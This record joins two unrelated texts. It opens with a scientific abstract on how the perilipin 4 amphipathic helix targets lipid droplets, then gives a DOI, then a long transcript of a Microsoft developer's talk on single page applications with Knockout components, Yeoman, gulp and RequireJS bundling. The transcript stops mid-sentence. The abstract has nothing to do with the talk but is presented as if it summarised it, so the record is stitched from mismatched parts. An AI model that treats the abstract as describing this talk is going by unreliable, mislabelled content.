Lipid droplets (LDs) are dynamic organelles that play an essential role in cellular lipid homeostasis and are implicated in many human pathologies (obesity, diabetes, cancer, etc.); however, the mechanisms of selective protein targeting to LDs to mediate their function are poorly understood. Many LD proteins interact with LDs via amphipathic helices (AHs), which can mediate direct and reversible binding to lipid surfaces, and are also present in numerous non-LD proteins. We use a uniquely long and monotonous AH, found in the mammalian LD protein perilipin 4, to probe the physico-chemical properties of the LD surface. We show that this AH is unstructured in solution but can adopt a highly helical conformation, over a length of hundreds of amino acids, when in contact with a lipid surface. The regularity of its amino acid sequence allows us to introduce subtle mutations that are repeated along the length of the helix in order to dissect the parameters that are important for AH targeting to cellular LDs. By this mutagenic approach, we show that LDs are relatively permissive for AH binding, suggesting a surface with abundant lipid packing defects, in agreement with predicted behavior of a phospholipid monolayer on a neutral lipid core (Bacle et al., 2017, Biophys J, 112:1417). We show that AH length, hydrophobicity and charge all contribute to LD binding. However, a small increase in the hydrophobicity of AHs that leads to improved LD localization also makes them more promiscuous for binding to other cellular compartments. These results suggest that the physico-chemistry of the perilipin 4 AH is exquisitely tuned to be specific for LDs. In vitro, we find that purified wild-type AH binds poorly to bilayer membranes. In contrast, it can interact efficiently with neutral lipids and is capable of forming small uniformly coated oil droplets. Accordingly, overexpression of this AH in cells overcomes a decrease in LD stability associated with phospholipid depletion. We propose that by substituting for the phospholipid monolayer, perilipin 4 may be important for stabilization of LDs when phospholipids are limiting, for example during periods of LD growth.
|
10.5446/50870 (DOI)
|
All right then. I think I'll just kick off now. Is that okay? Yeah, ready to start? All right then. So, hello and thank you. Let me start my timer. Thank you for coming to this session. It's really great to see you all. Obviously, it's kind of weird looking up like that at you all, but I will try and maintain good eye contact and be a good presenter in this talk. My name is Steve and I, what do I do? I work for Microsoft. I work on lots of different web stuff for them and I started off this knockout project a few years ago and so that's why this subject matters to me. I work on single page applications. I've got a special interest in knockout, so it matters to me and I think it probably matters to a lot of people actually, the whole single page applications thing because maybe four years ago when we started knockout, people were not really building such massive single page applications. Typically, people were using knockout to do just a little bit of interactivity on a bigger page and that was quite straightforward and knockout solved that problem really well, but things have moved on enormously in a few years since then and now people are building these huge applications that stay in the screen for hours potentially as the user is navigating down around loads of different things without doing any server side page navigation and that presents a load of new challenges and I don't think that we've necessarily provided all that much in the way of examples and docs and such that cover those kind of scenarios. So hopefully I'm going to redress that balance a little bit today. Now then, I should warn you before we get started that sometimes people have said that my presentation style is a little bit like this to the audience and to be honest that's probably fair. It might well feel a bit like this from time to time, but I would just say to you don't worry about it. It's okay because I'm going to talk about lots of different things in this talk and I'll be changing subject like every five to ten minutes. So even if you get a bit lost, it's okay. You can pick it up again as soon as we move on to the next thing. Alright, so don't worry, chill out. Now I'm going to start off with a few slides. I will be doing mostly coding this talk, but I want to also, I want to communicate mostly ideas, concepts, challenges, solutions rather than just going like here's some code, here's some more code, here's some more code. So there will be a little bit of slides to start off with and I hope you'll find this valuable. So I just want to introduce some of the pros and cons of this single page application thing. I'll probably be talking about more about the cons than the pros because I think that's where there's more interesting stuff, but we will start with a bit of positivity. So what's positive about writing single page applications? Well, you know, why are we willing to give up on our 15 years of experience of doing server side page rendering? You know, are we mad? Why are we doing this? Well, you know, there's a few really key benefits and the chief among them is probably that we can produce the best user experience that can be delivered through a web browser. So we can produce applications that are just as responsive and nice to use or even more so than native desktop and mobile applications. But we're not writing native code, we're still writing cross platform code. 
And these two things together are the absolutely killer features of single page applications and this is pretty much the solid reason why you would be wanting to do this. And everything else is just a small benefit. But I'll just round it off a little bit. A few more smaller benefits are that as a developer, you can really just focus on the one technology. You can just get really good at your HTML and your JavaScript and your CSS and you don't have to spend half of your time doing that and half of it working with some almost unrelated server technology. So that can be nice for you. It also means that as you go further with this, you build more and more of your application that's able to run on the client without having that many server dependencies. And so if you use some kind of client side data store as well, you can even make your application work offline to some extent or at least work very responsively even in the presence of an intermittent network connection. So that's nice. And if you go really far with this and what you end up delivering is basically just static HTML and JavaScript files that talk to back end servers, then you can even deliver that around the world just by throwing it onto any static file host CDN type thing and you will get blazingly fast global distribution for basically no money whatsoever. So that's quite nice as well. But really, the two key things are the user experience and the cross flat formness. Now, my experience in this, I've worked on quite a few different single page applications, but this is the one I'm working on at the moment. How many of you have seen this or used it? Okay, wow, that's good, like a half of you. Right, so this is the new Microsoft Azure Management Portal. And this is a very, very large single page application. And it's quite advanced in many ways. It's got quite an advanced user experience. The user navigates around through these different blades that open up and they can slide back to where they came from. And this is really giving desktop applications a run for their money. I think you wouldn't even expect to do something as good as this in a desktop app. And it's got many other advanced features as well. Obviously, it's pulling in data from many, many, probably hundreds of back end servers to provide all the information about what's going on in your cloud services. And the user can even do things like customize the UI. So for example, here, they're going to pin this file system storage graph onto the home screen there. And then they could go along and say, hmm, I also want to keep an eye on the number of HTTP requests. So I'll pin that to my start board as well. And then maybe they want to customize it a little bit more by resizing things and moving them around. Maybe they don't actually need that giant map that serves no purpose, but just looks pretty for demos. So they're going to make that get a lot smaller and move it away and so on. And as you can imagine, this is a big, big project. We've got dozens of teams in Microsoft contributing code into this thing. So it's kind of massive. And we needed an architecture that was really going to scale very well, both in terms of allowing lots of developers who don't really understand it to contribute good code to it, but also in terms of providing really great performance for the end user. So we're not shipping too much code, and we're being efficient about all aspects of the delivery there. So that's what I'm working on at the moment. 
And after my experience of working on that, would I say that it's easy to build a single page application? No. I would not say it is easy. I would say it can be very challenging compared with many other types of architectural patterns that you could try and follow. And I will be mainly focusing on the difficulties with it in this talk and ways that you can overcome one. So to summarize some of the challenges that I think that we've faced and that you will probably face if you build a large single page application, let's start with staffing. It doesn't seem like a very technical problem, but it's kind of the root of many other problems. If you are working so heavily with JavaScript, it's not enough to have just one developer who's great at JavaScript. You need your entire team to be great at it, and to all understand the libraries and technologies that you're using. And then what about architecture? With single page applications, there aren't any de facto standard architectures, which is an enormous challenge. You've got so many decisions that you have to make about what technologies you want to use and how to combine them. And no one's really giving you the answers there, or are they? We'll get to that. And then page weight. In our case, we've got many megabytes of code. And what are we going to do? Just ship all that in one big blob down to the browser? Are we going to load every single file independently? It's very difficult to figure out what the optimal strategy is there. And then maintenance. All software projects struggle with maintenance to some extent. But if you are relying primarily on JavaScript and CSS, well, those technologies are not really known for their easy maintainability. So although it can be done, it can be a challenge. So we'll look at ways to mitigate that. Library dependencies. Now, I've chosen this Tetris icon to represent library dependencies, because that really summarizes how I feel about it. Because on our project, barely a week goes by without someone saying, we now need this extra third party open source library. Oh, and we need this other one and this other one. And they've all got to fit together and work together nicely and not blow each other up in any way at all. So we've got to keep managing that all the time. Build and test time. Maybe you don't even think that's a big problem for a single page application, but it was for us. Until a few weeks ago, we had this three minute build cycle between every time you touched a file and you were able to see it running. And that was horrible, absolutely horrible. We have thankfully dealt with that now, but unless you're careful, you could end up in this situation as well. Performance and memory. If you were building a small single page application, maybe you don't care if it leaks a bit of memory. Maybe you don't even notice because the user will just leave and do something else in a minute anyway. But with a massive single page application, you cannot afford to be leaking memory over time. And that can be a real challenge. Okay, good. So those are some of the difficulties and we'll look at ways of mitigating many of them through this talk. And as you know from the talk title, I'm going to be talking quite a lot about knockout. Now I'm not saying knockout immediately solves all those problems, far from it. There's a lot more you need to think about, but knockout is the library that we use to build the Azure Management Portal. It's what runs all of the UI that you've seen there. 
So let's start by asking, why do you think we chose to use knockout on that project? And I know that some of you are thinking, oh, well, it's very obvious why you chose knockout, isn't it? Because you're enormously biased towards using knockout. So that's why you chose it. But no, that's not the reason, honestly. So when they chose to use it, I was not on the team. The causality is the other way around. I joined that team because they chose to use knockout to do some really interesting things. So why do they, independently of me, choose to use this library? Well, a number of reasons. Let's go through a few of them. One of them is very deliberately a library. It's not a framework. Like some of the other larger model view frameworks in JavaScript, it tries to just be a library. It's not trying to dictate your overall architecture. It's designed from the beginning to play well with lots of other different components, which is very useful if you're building a large application and you can't take too much of a big gamble on any one thing. Another thing, knockout system of observables gives us precise control over which parts of our data are observable and in what way. And that means that we can be very confident about scaling to work with enormous amounts of data. Because we know that when one thing changes, it only affects the immediate things that that changes. The system doesn't have to recompute 10,000 other unrelated computer properties just to see if they might have changed. Knockout knows what has changed because it knows the dependency graph. So that gives us the confidence to scale a lot more. Another thing, well, firstly this is meant to be a thumbs up icon. I know it looks more like a boxing glove, but that kind of fits the theme. Anyway, the point is here, knockout is not the best known of these kind of libraries. There are others, particularly things like Backbone and Angular that are better known. And so those would have scored more highly on this particular criteria. But knockout is well known enough that it's no problem for us to find developers who understand it and it's no problem to find third party resources and libraries to work with it. So it scores well enough on that point. Finally, on the good points, knockout has always prized backward compatibility, both with its own previous versions and with older IE versions. So even the very newest stuff, the new features that I'm going to show you today that deal with components and custom elements and stuff, it still supports IE 6, which is almost starting to seem ridiculous at this stage. But we just haven't had a reason to drop backward compatibility. So we're keeping it there for now at least. So yeah, fantastic compatibility. Now one of the things that knockout hasn't ever really attempted to do particularly much, and this is a point against it in many people's view, is it doesn't give you a ready made architecture. It leaves a lot of decisions up to you. But maybe something I'm going to show you today helps a little bit with that. So let me give you a demo of something new that's coming to knockout 3.2, which will be released fairly soon. Now I asked before this talk and most people said they'd use knockout. I think maybe even everybody. So I'm not going to give you an intro to knockout. This is like a hello world scenario that I'm going to convert into a component. So you probably all understand this immediately. I've got a view model with a name property, which is observable, and I'm binding this to my view. 
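A minimal sketch of the hello-world setup being described, with a view model constructor name of my own choosing; the uppercase value is written here as a computed purely to make Knockout's dependency tracking explicit (the talk binds the expression directly in the view):

```js
// View model for the pre-component hello world: one observable property,
// plus a computed that re-evaluates only when `name` changes.
function HelloViewModel() {
    var self = this;
    self.name = ko.observable('');
    self.nameUpper = ko.computed(function () {
        return self.name().toUpperCase();
    });
}

ko.applyBindings(new HelloViewModel());

// Corresponding markup, bound with data-bind attributes:
//   <input data-bind="value: name" />
//   <strong data-bind="text: nameUpper"></strong>
```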
And then I've got a text box here whose value is that name property. And then I'm saying I want to output the uppercase version of that name into a strong element there. So it'll show up on the screen. Let's just run it. And it will do exactly what you expect. So when I enter a name into here, then the uppercase version shows up here and everything stays in sync. Straight forwards, you've all seen that kind of code before, nothing clever. Now how can I convert this into a reusable component? Well, let's use the new components API. So I'm going to say knockout.components.register. And then I'll give a name to my new component. And I can call it anything I want, but I'm going to call it name editor. And then I give a configuration for my new component. And a component consists of a template and a view model. And these can be loaded from many different places. This is all pluggable. You can get them from AMD or you can hard code them in or whatever you like. For this Hello World demo, I'm just going to hard code the template straight into my config here. So I'm going to say template is this string. And I'm just going to cut this out here and drop this in here. And similarly on this line, I'm just going to drop that in there. Now of course, normally you would really load from external files. I'll show you that in a minute. But this is helpful to get started. And then I'll define a view model. And I can define that in a few different ways. But the way I'm going to do it here is a constructor function. So here my constructor function is going to define a name property. And I'm going to give that the same thing that we had before. So here's my name property of my component view model. Okay, good. So now I don't actually need this old view model at all anymore. And I can get rid of it from here. And if I want to use my new custom components, I can do it just like this. Name, editor. Great. A custom element. Let's see how this works then, shall we? Come back to my browser and reload. And you'll see it's still working as it did before. And this is now a reusable component. So I can, if I want to, let's say, well, let's have three name editors. Why not? And then when I go back, I've now got three name editors, which are all independent. They've all got their own view models and so on. And it's going to efficiently load the view models and the templates, what's it called, in parallel as it needs to render that UI there. Okay. So that's all very good. And there's loads more that we can do with components as well. For example, we can pass parameters into them. We can get parameters back out of them. We can subclass them. We can load them on demand. We can preload them. You've got a lot of opportunity there to compose a large application out of this system. And you may notice that this somewhat resembles the forthcoming web components notion, where you define custom elements and give behaviors and such to them. And yes, that's of course exactly what it's inspired by. But rather than waiting another like five years or whatever until every browser that your customers use supports that, you can just use that now even right back to IE6 because of the backward compatibility that we prize so highly. So that's a sort of hello world of components. But in this talk, I don't want to stop at this hello world level. I want to give you an idea of an application architecture that's realistic and could actually scale up to build a very large project. 
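Before moving on, here is roughly what the component registration demonstrated above looks like in one place. It is a sketch, with the template hard-coded inline exactly as in the hello-world demo; in a real project the template and view model would normally be loaded from separate files, as shown later in the talk.

```js
ko.components.register('name-editor', {
    // Inline template just for the hello-world case; normally loaded externally (e.g. via AMD).
    template:
        '<input data-bind="value: name" /> ' +
        '<strong data-bind="text: name().toUpperCase()"></strong>',
    // Constructor function: each <name-editor> element gets its own independent instance.
    viewModel: function (params) {
        this.name = ko.observable('');
    }
});
```

Usage is then just the custom element, repeated as many times as needed: `<name-editor></name-editor>`.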
And of course, testing a realistic large architecture involves making a lot of decisions. What libraries are you going to use? What kind of modular loader are you going to use? What kind of testing system are you going to use? And there are so many decisions there that you could spend weeks just thinking about and reading people's blog posts and changing your mind over and over. So would it be nice if you could just sort of scaffold up a nice happy starting point just to see how this works and you could even build on that realistically to make a very large application? So scaffolding systems. What scaffolding systems are there? Well, there are ones built into things like ASP.net and other server side frameworks. But besides that, you're probably aware by now that the front end world is kind of a thing in its own right. Front end developers, that is people who build applications that run in the browsers, well, we've got our own preferred technology stacks. We've got our own libraries. We've got our own conventions and culture, our own thought leaders. Front end development is a thing now. So if you're going to get good at front end development, you probably do yourself a favor of understanding these front end technologies. And so what I'm going to show you is how we can use a scaffolding system which is kind of a de facto standard in the front end world called Yeoman. And this allows us to scaffold our starting points and different application pieces for many different technologies. So there are scaffolders for pretty much all the frameworks you've heard of and of course knock out is one of the things that there are many different scaffolders available for. So let me give you a little demo of scaffolding something up that produces a realistic architecture for us with components. So I'm going to, we're going to need a little scenario for an application that we want to build and it doesn't really matter because this talk is about the architecture and not about the actual application itself. But just as a happy little gimmick, I decided, okay, let's make a website for like a cable TV company or something that wants to display an online TV guide and lets people navigate through channels and see what's on and that kind of thing just to set us a bit of a scene for us. Now we need a back end that's going to provide the raw underlying data for that and so I've already implemented that and as it happens I've did it with web API but the technology there doesn't matter at all. I could have done it with node or with basic or assembly or whatever like crazy thing that you want to do as long as it spits out JSON then our front end doesn't care and we're going to keep the front end totally separate from it. So I want to scaffold up a front end for this and at first I'm going to need to install the yeoman tool so I'm going to go NPM node package manager install globally yeoman. So like pretty much all of the other front end tools, yeoman is built on node.js and so we'll use the node package manager to install that and this is going to go off and install it for my user account and it says okay everything's looking good you've installed yeoman well done. Now yeoman doesn't come with any template or maybe it does I don't know but it doesn't come with all the templates that you want by default. So let's install the knockout template into it. So let's say NPM install globally the generator that's what yeoman calls them all called KO for knockout. 
So there are various different generators available for knockout and this one called generator KO that's the one that I've put together so I can vouch that at least it's sane some of the others are probably really good as well but I don't really know. Anyway we've got that now so we can use this generator. So let's go into the folder where we're going to spit out the code. So we'll go into the TV guide project here and I'm going to make a new directory called TV guide dot front end and I'll change into that directory and now I'm going to use yeoman. So I'm going to say yeoman I would like you to please scaffold up a knockout application yo-ko and that's going to go and do its thing now and firstly it starts with this slightly embarrassing looking ASCII art thing don't blame me for that that's just what yeoman does by default kind of that's how it rolls we can ignore that we just have to answer its questions what's the name of your new site okay how about TV guide that makes sense what language do you want to use ooh we could use typescript or JavaScript well I'll get on to typescript later let's just do some JavaScript for now do you want some automated tests with jasmine and karma yes please why not I'm not going to talk about tests immediately but I will get to them hopefully before the end of this talk so that is now going off and it's using Bower the JavaScript package manager to fetch all these libraries that we're going to use knockout jQuery jasmine require js and so on and it's also installing a test runner called karma that I'll show you in a little bit alright so that's now gone and done its thing and if I look in this folder now you'll see there's quite a lot of stuff there but it's a little bit difficult to understand it through the command line so let's look at it in visual studio now I'm going to do this slightly naff thing here of doing it as a website project so I'm going to import these files as a website project and that allows visual studio to just look at the files that are on disk and not have any actual you know CS project or anything like that now if you were going to do this for a longer period you probably would want to use a web application project which would work absolutely fine too you then just have to keep remember to add files as you go along or of course you can just not use a visual studio at all you can use sublime or anything else and then you don't have to think about that sort of stuff but of course this is going to get way better with the new esp net vnext tooling which is going to take away the need to think about things like project files but anyway for this demo it's very convenient for me to do it as a web application project in a real project I would either use web application or I would just use sublime anyway what have we got in here so we've got some node modules because the build and test system that I'll show you is like most front end tooling built on node so we've got various things in there to do with gulp and karma I'll show you that later we've also got a test folder you can guess what's in there we'll get to that and we've also got some other stuff to do with build and test that we'll think about later so now let's just look at this source folder what have we got in there well some stuff is kind of obvious we've got css and html you know what those do we've also got bower modules this is why bower has installed the javascript libraries that we're depending on knockout and require js and other stuff and then the real application code is 
in these two folders app and components now in app we've got things to do with the application startup so that's the routing configuration and where the module should be loaded from and so on and then we've also got components and let me actually run this before I show you the component source code so if I want to run this all I have to do is point any web server at all to this source folder because it's just static files I could use is or anything else I like engine x anything you want but for convenience I'm just going to use this node based HTTP server which is a command line tool and I'll tell it to serve up the contents of this source folder so that's running now and I can open that in my browser so let's go to localhost 8080 and you can see here is my starting point for my application and let's just check there's no errors there's no errors everything's good okay so we've got this simple bootstraps based UI here we've got the traditional home and about pages and as I navigate around it's doing this client side routing there I'll I think I'll call it routing since I'm British it's doing client side routing there and you can see that up in the URL and it's got no real functionality other than you can click this button and it's going to just change a message just to show you how it works so let's see a bit of code there the about page component is exceptionally simple it's nothing more than a single static HTML file and that just shows that a component doesn't have to have any more than just static HTML if that's all you want but of course most components will have a combination of a view and a view model so the home one for example has got this view here you can see it's got that message and it's got a button that you can click that does something and when we look at the code there you can see that what this is is a class that's got a message property and when you do something it changes the message so that's how that works and also it's been defined as an AMD module which allows it to be loaded on demand if that's what we want and we'll get to that in a minute okay so that's our starting point but let's add some functionality to this I want this to be a TV guide website so I want to fetch some data about what's on TV and display it in a nice sort of grid format so I'm going to do this by creating a new component and I'm going to call it a program grid and then the idea is I can reuse my program grid and give it different parameters anywhere I'd like in my application so I could create a component if I wanted by creating the files directly in Visual Studio but it's slightly more easy to scaffold it if I want so I'm going to go back into this folder and I'm going to ask Yeoman would you mind be so kind as to create me a new knockout component and we'll call it program grid so that is going to scaffold up the files needed program grid HTML and JavaScript and it's registered it in my application startup file so now if we come back to Visual Studio and we reload you'll see we've got our program grid down here and this is a nice new reusable component and let's see what's in there not very much currently it's just a sort of hello world thing where it displays a message and it passes that message from the view so here my constructor sets a message property with some observable object and that is what gets rendered in the view it's also got a dispose function on the prototype there which you can use for any cleanup if you want to but I don't need that in this example so let's get rid of that 
and we'll just keep it a bit simpler so if we want to use this program grid from somewhere else in our application it's very very easy indeed all we have to do is just use a program grid element now you don't have to use custom elements if you don't want to if you like you can use the knockout component binding and bind a component into a div or whatever else it is that you'd like but I quite like using this custom element so that's what I'm going to do and now I don't need the rest of this view so let's get rid of that and we'll just change the title to what's on TV okay so now let's go back to the browser and we'll reload and we should see that the title changes what's on TV and we can see the program grid has been injected and bound for us just like you would want it to be and the good thing here is that the home component doesn't need to know anything about the program grid component at all it's loosely coupled which allows your code your components to be quite easily reused in different places and it gives you lots of interesting opportunities when it comes to optimizing your build system as well as I'll talk about in a minute but we can still do things like pass parameters in and get data back out right then so let's put some real functionality into this program grid now I want to actually fetch some data from my back end and render it so this is I'm going to do it in a pretty straightforward way just because this doesn't need to be complex here's a very simple way of getting and rendering some data I am just going to define a channels array on my program grid here so this is an observable array because it can change over time maybe we would use web sockets to push new information in real time or something it doesn't matter but in any case I'm just making it observable so it can change and then I'm populating it in an incredibly straightforward way just do an Ajax request to the back end and stuff the result into the channels array and we're done let's render this in the view now shall we I'll go over to the view and I'll just delete the stuff that I had before I'm going to drop in some markup that I've already prepared so my pre-prepared markup here is going to use an html table and it's going to say in the body of that table iterate over each of the channels and for each of the channels let's create a table row and on each row we're going to have two columns the first column will display an image with the TV channels logo and then in the second column will iterate horizontally across all of the programs and for each program will display a div with the title start time and end time and so on so let's see if that works shall we I think it might not work to see but let's just see so let's hit reload and we'll see nothing seems to be happening and oh dear we've got a connection refused from the back end that's just because I haven't started my back end running just yet and I just realized that a minute ago so let me start my back end running now with a bit of control f5 magic there and so now I can reload and this time it successfully fetched some data from the back end there and we can just see all these different TV programs and stuff but the layout is absolutely horrific right now so let's use a little bit of CSS to end this up and this talk is not about CSS so of course you can use less or sass or whatever you like and you can plug that into your build system that I'll show you later but I'm not really interested in that so I'm just going to dump a bit of ready-made CSS into this 
file right now just so that we can move on to something more interesting so here's my ready-made CSS I'll come back and I'll hit reload and now you'll see it really does look like an actual grid of TV programs that you would expect to see from your cable TV company or whatever sorry that the title is a slightly distracting alright so that's good but currently I've not really shown you anything particularly clever like currently I'm not even passing any parameters into my grid what if I want to control which channels show up like maybe we want to show all channels or maybe we just want to show the channels that you'll subscribe to so let's have a go at passing some parameter into there I'll go back to where the grid actually gets used and I'm going to say I'll pass a parameter prams equals let's say only my channels true so now I'm passing that parameter in and if I come back and reload nothing changes at all because my component doesn't know anything about this particular parameter name so let's make it aware of that so I'll go into the view model for that and I'm going to define a new property on my view model here called Fint filter channels and what that's going to do is it's going to take the existing set of channels and it'll run an observable filter over that array so that'll keep updated as the underlying array changes and what it does is it works out whether or not we're currently being asked to run a filter and if we are then we'll only use the channel if we're subscribed to it and if we're not filtering then we'll just use all channels so now if I come back and reload then why didn't that do anything I think it's because I didn't really reload properly then nope not for that reason maybe I didn't type it correctly some some way only my channels true oh that's right because currently I'm still binding to the full set of channels I want to bind to just the filtered channels so now if I reload you'll see we just get the filtered channels there so that's how we can pass a parameter in and of course it doesn't have to be a hard coded value like I've shown you here it can be an observable property as well and that will automatically stay updated and now we've got this we can reuse our grid in various ways with different parameters so let's have all channels down here and we'll say only my channel is false and now when I reload we're going to have two grids now we'll just have my channels at the top and we'll have all channels below it so that makes it very nice and convenient to reuse okay now let's change our focus slightly let's think about performance for a little bit or at least performance in terms of how this stuff is delivered to the browser let's see how many HTTP requests we're currently using so if I go into the about tab here and I reload then I look at the let's look at the network tab if I zoom in a bit you'll see we're making 18 HTTP requests to run that page even though it's completely trivial what HTTP requests are we doing? 
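(As a brief aside before the network discussion: here is the program-grid component built above, condensed into one sketch. The module layout, property names such as filteredChannels, and the back-end URL are illustrative rather than the exact code from the demo.)

```js
// program-grid component: fetches channel data and exposes a filtered view of it.
define(['knockout', 'jquery', 'text!./program-grid.html'], function (ko, $, template) {

    function ProgramGrid(params) {
        var self = this;
        self.channels = ko.observableArray([]);        // raw data; observable so the view tracks changes

        // Derived, filtered view of the data: re-evaluates whenever `channels` changes.
        self.filteredChannels = ko.computed(function () {
            return self.channels().filter(function (channel) {
                return !params.onlyMyChannels || channel.subscribed;
            });
        });

        // Populate from the back end in the simplest possible way.
        $.getJSON('/api/channels', function (data) {
            self.channels(data);
        });
    }

    return { viewModel: ProgramGrid, template: template };
});

// Usage from another view, passing a parameter:
//   <program-grid params="onlyMyChannels: true"></program-grid>
//   <program-grid params="onlyMyChannels: false"></program-grid>
```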
Well we're loading bootstrap and require and jQuery and knockout and crossroads and bootstrap and then we're loading all of the components like we're loading the about page we're loading the navbar template we're loading the navbar view model everything is loading separately and this is in some ways good and in some ways bad now it's good in that in the files that we're seeing in the browser dev tools exactly corresponds to the files that we see on our IDE which is really convenient in development and another good thing is we've got incremental loading here so if I start on the home page and I reload and then I clear the list of requests as soon as I switch to the about screen you'll see it dynamically fetches the template there so we've got automatic dynamic loading of different views and view models as we go along because it's all built on required.js so that's in some ways good but it's also really bad because we're just doing loads of HTTP requests wouldn't it be nice if we could bundle them and minify them you're all familiar with bundling and minifying right so let's say that we do want to do some bundling and minifying how can we do that well this brings us on to the topic of JavaScript build systems and since this talk is not all about knockout I'm also just want to cover some general principles for writing efficient single page applications let's just think about build systems for a minute so you are all familiar with other build systems like MS build or enant or something I don't know what you use how many of you have used either grunt or gulp before okay reasonable number like 20% okay I'll go through this fairly quickly then because a lot of you know this so these are JavaScript build systems that are like most front end tools built on Node.js and the idea is that for example with grunt you run it from the command line and it's going to go through a series of tasks that you've configured maybe to do things like link your code to come to bundle it to minify it to output it to a certain location and you run all that from the command line and that's very convenient and it's all fully designed to work with front end technologies like things like cof script type script all that kind of stuff so that's good now let's just compare these two things a little bit grunt has been around for a little bit longer of the two and what it's like to work with grunt is like this the configuration system is fairly declarative so if you want to configure for example a concatenation step you would declare oh you're going to get all the files from this location you're going to output to them to this other location and you would use declarative config for all the different tasks that you want it to do and you would also get it to load the code that executes those tasks from npm that's the node package manager and then finally you would give names to your tasks for example you say that the default task involves running the three three different steps in sequence queue in it and then concat and then minify and this is quite nice actually I do like it I've used it for over one to two years now this is what we use to build knockout and it generally works pretty well but there's also this newer thing that's come along more recently called gulp and the argument with gulp is what about if we don't want to keep dropping all these temporary files in different locations and picking them up and generally having to figure out different declarative config syntaxes wouldn't it be nice if we could just stream our 
files through a configuration that we define in code and so what it's like to work with gulp is a little bit more like the following now I've I started using gulp maybe three or four months ago and I really like it actually this is generally what I'm considering as my default system for new projects now I do enjoy it but that's not to say that grunt isn't still good so what it's like to work with gulp is a bit like this you start by declaring some some imports that you need to execute the various tasks that you want and these will all come from npm like the code to minify stuff and so on and then you would also declare tasks that you give a name to so you might say that when I want to process my scripts which is just an arbitrary string I want you to grab all the files under a certain directory and then I want you to pipe them through js hint to check for any errors and then pipe the results from that through a minification process with no temporary files this is all in memory and running in parallel and then pipe that all through a concatenation step and pipe all that out back onto disk and similarly for css maybe you'll do a similar thing except that you pipe it through a less processor and then finally you give names to the the tasks that you're working with so maybe your default task involves running scripts and styles in parallel because it's all going in parallel through streams and maybe you also want it to watch all the files in a certain folder so that when you change something it's going to rerun certain tasks so that's what it's like to use gulp and I really like it so that is what this scaffolding system sets up for you by default let's have a go at using it shall we and before we start I want you to realize and or remember at least the situation that we're in right now so the situation right now is that when you reload this about page we've got 18 separate HTTP requests going on to fetch all the different parts of the application and that is a bit much to be completely honest also notice that in the application folder we've got a source folder here but we have not got a disk folder and disk is where we're going to put the build output so we'll see that appear in a second now we have already got this gulp file that was set up for us I'm not going to go through every line of it but just to give you a quick overview it's got various tasks things like processing JS, processing CSS, HTML, cleaning all the build output and then finally it declares that the default task if you run it with no arguments involves running these three other tasks simultaneously and then giving this message so I will show you a little bit more of that in a second but let's just run it first so I'm just going to run gulp on its own to run the default task and that's going to run these things that have been declared by the scaffolder so that's doing its thing now it takes a few seconds it's going to take like seven seconds and of that seven seconds more than six of them are just running ugly file.js so that's pretty much all the cost of doing that if you just temporarily comment that out it will all go really fast but I want to have that on for this talk so that's output everything to the disk folder so if I come back to VS now and I hit reload we'll see a disk folder has appeared and it hasn't got very much in it really it's got one CSS file one HTML file one JavaScript file and some web fonts we won't worry about those things so it's got the what on earth is that supposed to mean go away so it's got these 
three files that there's basically all that we need to run our application and if I want to run that now I'm going to stop my web server that is serving the source folder and I'm going to start the web server serving the disk folder instead so this is what you would actually publish to the public internet and people would load to their browsers and now if I come back to my browser and I hit reload then instead of doing 19 requests it's now done three requests one HTML file one CSS one JavaScript and everything has been nicely bundled up into there and I'll show you more about how that works in a second but we're not completely finished yet because it doesn't quite work if I switch on to the home screen we'll get an error what's this error then we're getting a 404 not found it's trying to dynamically load our program grid and it's not there because the program grid isn't there is a standalone file in the disk folder so why is this is this some kind of a bug like why didn't include the program grid in the build output it's not a book otherwise I wouldn't have shown you I would have pretended it wasn't there it's quite deliberate so the system of components is very deliberately all about being loosely coupled and it's so loosely coupled that the required JS optimizer that walks through the dependency graph to find out how all of your code depends on other code doesn't even know that you're using the component it's just too loosely coupled and also sometimes you're going to want to preload your components and other times you'll want to dynamically load them so you need to declare which components are going to be included in the preloaded bundle and that's what I didn't do just yet so let's do that I'll go to my gulp file and you'll see up here this is the required JS optimizer config the required JS optimizer is the thing that understands all the different AMD modules that I've got walks through them understand the dependencies and is able to output bundles and currently it's including in the default bundle everything that the app startup file needs so that's all the library code and the routing config and everything and then I also explicitly have to reference any components that I'm using that are not known to the startup file so you can see the navbar the home page and the about component because that's nothing more than an HTML file you have to use a slightly odd syntax to import it because it has to get converted to a JavaScript wrapper anyway I want to import I want to include the program grid component here so I'm going to reference that it's in a folder called program grid and the actual module name there is program grid so that's now included let's go back and I will rerun gulp there and then that will hopefully be included in the scripts.js bundle file when it's outputted so now that's done I'll come back and I'll reload and instead of getting an error this time I will get my actual application working exactly as it should so that's good or is it's good really let's just take a step back for a minute so what we've accomplished now is that we're now preloading absolutely everything in a small number of files and that's kind of cool because we're doing a small number of HTTP requests but it's also not cool in a certain way because we're preloading everything even the stuff that the user doesn't even see and this is a bit of a problem for us on the Azure management portal right now because as it stands we preload every single thing there is whether or not you are ever going to see it 
and that is too much stuff really so we are working on producing a system now where it preloads some things and dynamically loads other things and out of the stuff that's dynamically loaded you don't still want to get all the files individually you still want to declare bundles that represent the sort of units of navigation that a user will normally do so you preloaded the right stuff and the other stuff comes in appropriately sized bundles can we do that with this build system of course we can otherwise I wouldn't be talking about it so let's go and have a look so you can see that we've got this bundles config here now require.js only got bundles support proper bundles support in the last few months so I'm betting that most of you haven't really used this bundles feature just yet but it works really well so what I can declare is arbitrary names for other bundles that will be packaged and loaded as a unit so let's say that I don't want to load the about page up front I only want to load that on demand so I'm going to take it out of my list of preloaded things there now I'm going to create a new bundle and I can call this anything I want let's call it about stuff alright and I can put an array of all the AMD modules that should be included in that bundle and I'm just going to put this about page thing in there now it's just a simple html file but there's no reason it's limited to be that it could be any AMD module including one with dependencies that have other recursive dependencies and so on and the bundler will figure all that stuff out for us so now when I come back and I'll reload gulp again instead of producing just a single scripts.js file when it's finished has it finished yet not yet here it comes if I come back and I reload my mouse is not working seriously my mouse is not working what's going on that's strange okay I'll hit reload now instead of just having scripts.js we've also got about stuff.js so that's been outputted as well and if we go over to the browser and I come over and I'm on the home page and I hit reload it currently is loaded everything it needs but it hasn't loaded anything to do with the about page at all and if I go to the network tab and I clear what it's already got there and I switch to about you'll see it dynamically fetches about stuff.js because it knows that the files it needs are in that bundle and inside there you'll see there's just the stuff that we need to render the about page it's just trivial right now but it could be a lot more and the important thing to understand here is that this bundle config has no impact whatsoever on my application architecture in development I do not have to think about this at all I just work with all the files as they are on disk and then the choice of bundling strategy is something that you can think about when you're going to production and as a sort of matter of DevOps so your DevOps team or you if you do 